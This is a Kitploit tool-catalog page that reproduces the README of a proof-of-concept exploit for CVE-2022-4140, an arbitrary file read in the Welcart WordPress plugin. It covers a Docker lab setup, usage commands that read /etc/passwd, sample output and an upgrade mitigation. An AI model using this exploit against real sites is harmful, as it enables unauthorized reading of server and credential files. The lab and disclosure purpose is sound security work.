Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-4140 — WordPress plugin Welcart e-Commerce < 2.8.5 - Arbitrary File Read | Kitploit
Инструменты/GitHubGitHub/anirbala98/cve-2022-4140
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubanirbala98/cve-2022-4140

CVE-2022-4140

WordPress plugin Welcart e-Commerce < 2.8.5 - Arbitrary File Read

Репозиторий
11012 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Контент недоступен на запрошенном языке. Показываем английскую версию.

CVE-2022-4140 - WordPress plugin Welcart e-Commerce < 2.8.5 - Arbitrary File Read

This repo contains a Proof of Concept(PoC) exploit for CVE-2022-4140.

Disclaimer

This project is provided for educational purposes and authorized security testing only. Do not use it against systems that you do not own or have permission to test.

Overview

The plugin does not validate user input before using it to output the content of a file, which could allow unauthenticated attacker to read arbitrary files on the server

Affected Version

All versions of the plugin upto 2.8.4 are affected.

Requirements

  • Python 3.13.14
  • Requests 2.32.5

Vulnerable environment setup

Pre-requisites: Docker and Docker compose installed

  1. Create a home directory
root@kitploit:~
mkdir wordpress-docker
cd wordpress-docker
vim docker-compose.yml
  1. Create a docker-compose.yml file
root@kitploit:~
services:
  db:
    image: mysql:8.0
    container_name: wordpress-db
    restart: unless-stopped
    environment:
      MYSQL_ROOT_PASSWORD: rootpassword
      MYSQL_DATABASE: wordpress
      MYSQL_USER: bala
      MYSQL_PASSWORD: password
    volumes:
      - db_data:/var/lib/mysql

  wordpress:
    image: wordpress:latest
    container_name: wordpress
    restart: unless-stopped
    depends_on:
      - db
    ports:
      - "8080:80"
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: bala
      WORDPRESS_DB_PASSWORD: password
      WORDPRESS_DB_NAME: wordpress
    volumes:
      - wordpress_data:/var/www/html

volumes:
  db_data:
  wordpress_data:
  1. Start the container
root@kitploit:~
sudo docker-compose up -d
  1. Download the vulnerable plugin and copy to relevant folder
root@kitploit:~
svn checkout https://plugins.svn.wordpress.org/usc-e-shop/tags/2.8.4/
mv 2.8.4 usc-e-shop
sudo docker cp usc-e-shop wordpress:/var/www/html/wp-content/plugins/
  1. Complete WordPress Installation
  • Navigate to http://localhost:8080 and select English when asked for the language.
  • Enter a site title, username, password and email address.
  1. Activate the plugin
  • Log into admin dashboard at http://localhost:8080/wp-login.php by entering the username and password configured in the previous step.
  • On the left hand menu, select Plugins-> Installed Plugins
  • Locate the Welcart e-Commerce plugin and click on Activate.

Exploit installation

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2022-4140.git
cd CVE-2022-4140/
pip install -r requirements.txt

Usage

root@kitploit:~
python exploit.py <base_url> -f <file location> --disable-version-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd

Example

root@kitploit:~
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd                             
[*] Checking if target is vulnerable
[+] Plugin version detected: 2.8.4
[+] The target is vulnerable

[*] Attempting to read arbitrary file

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

Mitigation

Upgrade the plugin to version 2.8.5.

References

  • https://nvd.nist.gov/vuln/detail/CVE-2022-4140
  • https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7/
  • https://plugins.svn.wordpress.org/usc-e-shop/tags/2.8.4/
Скачать инструмент